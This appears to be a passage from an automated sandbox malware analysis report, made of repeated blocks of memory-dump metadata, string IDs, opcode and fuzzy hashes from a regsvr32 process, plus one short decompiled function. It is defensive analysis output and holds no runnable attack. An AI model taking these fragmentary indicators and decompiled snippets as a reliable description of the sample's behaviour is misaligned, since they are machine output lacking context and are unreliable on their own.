• Opcode Fuzzy Hash: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
• Instruction Fuzzy Hash: D3710670500749CFDB48DF24C88A5DA7BA1FB58359F114329FD8AAB260D778D994CBC4
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6$D
                                                                                                • API String ID: 0-3309211938
                                                                                                • Opcode ID: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                • Instruction ID: 8abd46ab5c716f0c1193b73faa51760104f5450e471d3247e89c534628e2e1cf
                                                                                                • Opcode Fuzzy Hash: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                • Instruction Fuzzy Hash: 7B5139705247899BDB98CF28DC899993BE4FB45308F90626CFD86C7292C778D886CB41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #T$(Pv0
                                                                                                • API String ID: 0-2531358951
                                                                                                • Opcode ID: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                • Instruction ID: 69a444e7a9732d9e7b0525a83a494644ecf42dabb901e085fcc75cc3de8651bc
                                                                                                • Opcode Fuzzy Hash: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                • Instruction Fuzzy Hash: E0512D7050030E8BDF58DF24C88A5DE3FA0FB28398F251619EC4A96294D378D999CFC5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $$%9
                                                                                                • API String ID: 0-3031553271
                                                                                                • Opcode ID: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                • Instruction ID: ddb64e9b2fc000161370315fa9e6ca65c208e2ab0631a3c3472ab67444f95e47
                                                                                                • Opcode Fuzzy Hash: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                • Instruction Fuzzy Hash: BB415E7061C784ABD798CF1CC4D962ABAE1FBC4355F90592EF986C7391C738C9489B42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: gd$s=z
                                                                                                • API String ID: 0-3301279615
                                                                                                • Opcode ID: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                • Instruction ID: fc1624ceb1801c1b8ba2e30c42e57d82880dfea1065d97e63a353184eb2e0eba
                                                                                                • Opcode Fuzzy Hash: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                • Instruction Fuzzy Hash: E651E1B190030A8FDB48CF68D48A5DE7FB1FB68388F204219FC56A6250D37886A4CFD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !oW!$ke&Q
                                                                                                • API String ID: 0-419570616
                                                                                                • Opcode ID: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                • Instruction ID: a85cb7c4c3816d5d9881c9b229cd75642f39a765d358198eb8f6b6e20a8a7575
                                                                                                • Opcode Fuzzy Hash: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                • Instruction Fuzzy Hash: 2851D7B090074E8FDB48CF68C88A5DE7FB0FB68398F114619EC55A6290D7B496A5CFD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ?j|$P
                                                                                                • API String ID: 0-615948335
                                                                                                • Opcode ID: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                • Instruction ID: 54af719df94cd1004c00c0992901a7b409640683cfed8521277752c6c06ac73b
                                                                                                • Opcode Fuzzy Hash: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                • Instruction Fuzzy Hash: DF41D3B090034A8FDB48CF64C48A5DE7FB1FB68388F50461DE816A6390D77896A4CFD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$aI
                                                                                                • API String ID: 0-3604358270
                                                                                                • Opcode ID: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                • Instruction ID: 89885a7f0ea6e34192c17b1e4d5a56b0bcb38eba5252283cfcfdb926a6f01253
                                                                                                • Opcode Fuzzy Hash: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                • Instruction Fuzzy Hash: 3741C6B190038A8BCB48DF64C99A5DE7BB1FB48358F114A2DF86697350D3B49664CF84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: j$[
                                                                                                • API String ID: 0-3696242357
                                                                                                • Opcode ID: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                • Instruction ID: 51319176227fe189211dc97a68349c8ea8d43089282181feacd9770dc1314f70
                                                                                                • Opcode Fuzzy Hash: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                • Instruction Fuzzy Hash: B241D5B090074E8BDB48DF64C48A5DE7FB1FB58398F11861DE856A6290D3B4D6A4CFC1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: + $S"
                                                                                                • API String ID: 0-2880694137
                                                                                                • Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                • Instruction ID: d53249c5aec74aaae67b91d0133c93c8e90d7a7d6d5a5bddf2f0ccdb9a54e6d8
                                                                                                • Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                • Instruction Fuzzy Hash: F451B6B090078E8FDF88DF64C88A5DE7BB0FB58354F10461DE866A6250D3B8D665CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: =K$d%
                                                                                                • API String ID: 0-2790768846
                                                                                                • Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                • Instruction ID: b96188b3b354e3d9ff7c6d4fd229b80d2b7a4e47d4225455cd2d0885f328acbe
                                                                                                • Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                • Instruction Fuzzy Hash: F841E4B090074E8BDF48CF64C88A5DE7FF0FB58358F104A1DE86AA6250D3B89665CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #|$`
                                                                                                • API String ID: 0-1687004633
                                                                                                • Opcode ID: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                • Instruction ID: 871168e52915af456c52feabdf5f3932238cf700321dac83cb1a8865442d0da3
                                                                                                • Opcode Fuzzy Hash: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                • Instruction Fuzzy Hash: E641D5B190078E8FDF88CF68C88A4DE7BF0FB58358F014619F856A6250D3B89665CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: c$j~;
                                                                                                • API String ID: 0-3832213246
                                                                                                • Opcode ID: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                • Instruction ID: 573eb8d44931a6d2c45096819a89464516f796e4507ca73b86cca08e416dcd54
                                                                                                • Opcode Fuzzy Hash: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                • Instruction Fuzzy Hash: E941A5B080078E8FDB88DF64C88A1DF7BB0FB54358F104A19EC66A6250D3B89661CFD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: -h$W
                                                                                                • API String ID: 0-4146498651
                                                                                                • Opcode ID: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                • Instruction ID: f88557447342bb8f1509c4b38bb67a2c904d8a33c50db15995025d19bed1c1c6
                                                                                                • Opcode Fuzzy Hash: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                • Instruction Fuzzy Hash: AE41B4B590038E9FDB44CF68D88A5CE7FF0FB48358F114619F869A6250D3B49664CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .$fp
                                                                                                • API String ID: 0-3298127435
                                                                                                • Opcode ID: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                • Instruction ID: 23804cbe39bbfc70a2e65fb934bdbe48d0393d975391d1e9042b498201f7f324
                                                                                                • Opcode Fuzzy Hash: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                • Instruction Fuzzy Hash: EE41F4B190470E8BDB88CF64C48A4DE7FB0FB28398F114619E856A6290D3B89665CFC4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "$Zs
                                                                                                • API String ID: 0-3922668666
                                                                                                • Opcode ID: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                • Instruction ID: f1d62621bd08a38fa15a490595be93b85bae5397fb0987493b8f1264ce03d9fe
                                                                                                • Opcode Fuzzy Hash: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                • Instruction Fuzzy Hash: 803192B0529380ABC388DF28D19A91EBBE1FBD5708F806A1DF8C286390D374D406CB43
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: XW$s [
                                                                                                • API String ID: 0-2366283936
                                                                                                • Opcode ID: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                • Instruction ID: c8620a86b0501fca327921337904d07bbca0ac58b79dbc40019122cd377fd21c
                                                                                                • Opcode Fuzzy Hash: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                • Instruction Fuzzy Hash: 623190B190478E8FDF48DF28D88949A3BE1FB48304B004A1DFC6AD7250D7B4D665CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4V$jn(
                                                                                                • API String ID: 0-2529302498
                                                                                                • Opcode ID: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                • Instruction ID: cb5d544f3b4b9f04c9dfd671481ec3bad593690e5eb4dddf862df6e3aa1dae86
                                                                                                • Opcode Fuzzy Hash: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                • Instruction Fuzzy Hash: 17317EB1529381AFC398CF28C48A91ABBE0FBC9318F806A1DF8C686260D774D555CB02
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: '$%6
                                                                                                • API String ID: 0-1852427169
                                                                                                • Opcode ID: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                • Instruction ID: 05249663a0179330ad45d21934dcfd5c9628912d79576b4f5c22a08ed84997fc
                                                                                                • Opcode Fuzzy Hash: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                • Instruction Fuzzy Hash: CD316FB5568381ABD388DF28C48A81ABBF1FB89308F806A1DF8C6DB251D775D545CB43
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: uS$J
                                                                                                • API String ID: 0-437994327
                                                                                                • Opcode ID: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                • Instruction ID: 1ce228b0cfa9813743cf27bcf6c0bf8cf49702ff025c7f76aeb22f23eae1a472
                                                                                                • Opcode Fuzzy Hash: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                • Instruction Fuzzy Hash: 3A31D7B190034E8FDB84CF64C88A5DE7FB0FF28358F104619E859A6260D3B89695CFD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +@$`.P
                                                                                                • API String ID: 0-1189405855
                                                                                                • Opcode ID: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                • Instruction ID: 39de2ea6a026fc69778914cf9e44a5f31bb4615b8119a4e03ad8497b2faa6ad6
                                                                                                • Opcode Fuzzy Hash: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                • Instruction Fuzzy Hash: A1316FB15187848FD348DF28C45941BBBE1BB9C758F804B1DF4CAAA260D778D645CF4A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ^$R
                                                                                                • API String ID: 0-3595634639
                                                                                                • Opcode ID: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                • Instruction ID: 7dec6e6ff202478201587024085261afee01554c9ae7569198c8fcb843946a7e
                                                                                                • Opcode Fuzzy Hash: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                • Instruction Fuzzy Hash: 112180B0528781AFC398DF28D49591FBBF1BB88744F806A1DF8C686390D779D505CB46
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: t^$w
                                                                                                • API String ID: 0-1486493484
                                                                                                • Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                • Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
                                                                                                • Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                • Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #
                                                                                                • API String ID: 0-606707520
                                                                                                • Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                • Instruction ID: 1f292d33c5d9ded8f96421762096b996a085c69e8e17c29299c65111ab5ed876
                                                                                                • Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                • Instruction Fuzzy Hash: 01223770D14709EFDB58DFA8C49A59EBBF1FF44348F00816DE80AAB290D7749A19CB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
                                                                                                				signed long long _t25;
                                                                                                				void* _t27;
                                                                                                				void* _t30;
                                                                                                
                                                                                                				 *((long long*)(_t30 + 8)) = __rbx;
                                                                                                				 *(_t30 + 0x10) = _t25;
                                                                                                				 *((long long*)(_t30 + 0x18)) = __rsi;
                                                                                                				_t27 = (_t25 | 0xffffffff) + 1;
                                                                                                				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
                                                                                                				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
                                                                                                				return __rdx + 0xb;
                                                                                                			}
                                                                                                0x180008d28
                                                                                                0x180008d2d
                                                                                                0x180008d32
                                                                                                0x180008d56
                                                                                                0x180008d5d
                                                                                                0x180008d70
                                                                                                0x180008d91

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                • Instruction ID: 1f7af7de608e037a3e69fafdab2b7a4d19b0596ea53e23cf5e8b59c7fdfa90c1
                                                                                                • Opcode Fuzzy Hash: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                • Instruction Fuzzy Hash: D151C432700B9489FBA1DB72A8447DE7BA1B7587D4F148225FE9827B99DF38C605D700
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ef
                                                                                                • API String ID: 0-3522424648
                                                                                                • Opcode ID: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                • Instruction ID: 3695dd7ca703f485978d244a3dce06a9734b614b9e66a4c0f1c675e52f7ae903
                                                                                                • Opcode Fuzzy Hash: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                • Instruction Fuzzy Hash: 90021870A04709EFDB58DF68C08999EBBF2FF44314F00816DE84AAB250D775DA59CB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: x]!-
                                                                                                • API String ID: 0-585868058
                                                                                                • Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                • Instruction ID: c0caf49efaf4e7b6b8b85a917690f4cead46df9ee068c3eb0936d78760157e49
                                                                                                • Opcode Fuzzy Hash: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
• Instruction Fuzzy Hash: 86D189B1A0060DCFDBA8CF78C54A5DD7BF1BB48308F606129E826AA2B6D7749905CF54
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: }^O
• API String ID: 0-3039680174
• Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
• Instruction ID: 53642538cb77d7bae0fb869666aee9711a64a4427383f787048f353d2d520192
• Opcode Fuzzy Hash: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
• Instruction Fuzzy Hash: F6A17BB2502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D3B4E925CB49
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: RH
• API String ID: 0-2975065227
• Opcode ID: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
• Instruction ID: 3e9ea7abd6ddf5187d2892a095e774ea9f9f31c9cc8157a9a0ed80b7046413ee
• Opcode Fuzzy Hash: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
• Instruction Fuzzy Hash: 87513B7111C7448FC7A8DF18D4C66AAB7E0FB84310F90991DE8CEC7251DF74A88A9B46
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
